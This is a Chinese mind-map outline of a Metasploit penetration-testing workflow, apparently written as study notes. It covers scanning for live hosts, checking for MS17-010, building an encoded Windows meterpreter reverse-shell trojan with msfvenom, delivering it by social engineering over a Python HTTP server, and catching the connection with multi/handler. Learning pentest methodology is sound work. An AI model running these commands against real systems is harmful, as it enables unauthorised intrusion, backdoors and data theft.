导图社区 2.Msfconsole
第一步:终端启动MSFCONSOLE 以管理员身份运行 sudo msfconsole 出现msf提示符了,就登录成功了 第二步:寻找模块 使用search加上自己想找的模块(相当于模糊查询) 使用search命令搜索所有有效的Linux模块 search linux
后渗透之meterpretermeterpreter常用命令1.基本命令2.文件系统命令3.网络命令4.键盘监听5.系统命令6.mimikatz7.网络嗅探8.获取敏感信息9.获取 Hash10.通过 Hash 获..
meterpreter是metasploit中的一个杀手锏,通常在漏洞利用成功后,会返回给攻击者一个攻击通道,其中有很多自动化操作 首先,我们使用metasploit中的另一个后门工具msfvenom生成一个木马...
社区模板帮助中心,点此进入>>
互联网9大思维
组织架构-单商户商城webAPP 思维导图。
域控上线
python思维导图
css
CSS
计算机操作系统思维导图
计算机组成原理
IMX6UL(A7)
考试学情分析系统
msfconsole漏洞利用流程
前期交互
与客户组织进行交互讨论,确定范围,目标等
情报搜集
获取更多目标组织信息
基于 msf 发现内网存活主机
search 搜索
msf 终端内输入 search scanner type:auxiliary
利用过程
增加模块:use auxiliary/scanner/discovery/arp_sweep
子主题
查看信息:options
增加攻击机:set rhost 192.168.1.0/24
执行run
发现主要模块
基于ARP发现内网存活主机
auxiliary/scanner/discovery/arp_sweep
基于UDP发现内网存活主机
auxiliary/scanner/discovery/udp_sweep
发现FTP服务
auxiliary/scanner/ftp/ftp_version
发现HTTP服务
auxiliary/scanner/http/http_version
基于smb发现内网存活主机
auxiliary/scanner/smb/smb_version
基于netbios发现内网存活主机
基于snmap发现内网存活主机
基于icmp发现内网存活主机
威胁建模
理清头绪,确定出最可行的漏洞利用通道,这个建模阶段写的文档不是给自己看的是给整个团队看,方便多人合作
主要是根据收集到的情报进行整理,理清漏洞利用思路
经过第一步情报收集,我们通过arp发现了目标机器ip
然后通过对目标机器的ip扫描,我们知道了,目标机器开通了80端口,有web、ftp、smb
最终决定对smb相关的漏洞进行利用
备选方案通过植入木马的方式进行利用
漏洞分析
搜索可获取的渗透代码资源
主要:挑选匹配可能存在的漏洞利用模块,shellcode
漏洞实例
查询msf与永恒之蓝相关的模块
search ms17_010
然后我们利用了一个永恒之蓝扫描模块
use auxiliary/scanner/smb/smb_ms17_010
输入 options 查看扫描模块需要配置的参数
options
然后我们配置 rhost (rhost指的是目标主机ip)
set rhost 192.168.1.128
run
用后门来控制
用msfvenom 生成一个平台的木马
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.138 LPORT=4446 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
漏洞生成后,通过启动一个 py 服务将木马上传到目标机器
社工上传
python 开启服务
python 2
python -m SimpleHTTPServer 端口号
python 3
python -m http.server 端口号
配置监控程序
use exploit/multi/handler
配置信息
配置 lhost(lhost本机)
set lhost 192.168.138
配置 lport (lport监控的端口和后门端口一致)
set lport 4446
配置攻击载荷 payload
set payload windows/meterpreter/reverse_tcp
利用成功并获得 meterpreter
后渗透利用
报告阶段
渗透利用阶段
找到安全漏洞,入侵系统
这个阶段尝试利用漏洞,配置监控,开始漏洞利用
后渗透利用阶段
Meterpreter,实施操作
主要:开始实施相关数据下载,后门维持,提权等操作
漏洞利用渗透报告(详细报告编写看,渗透测试报告课程)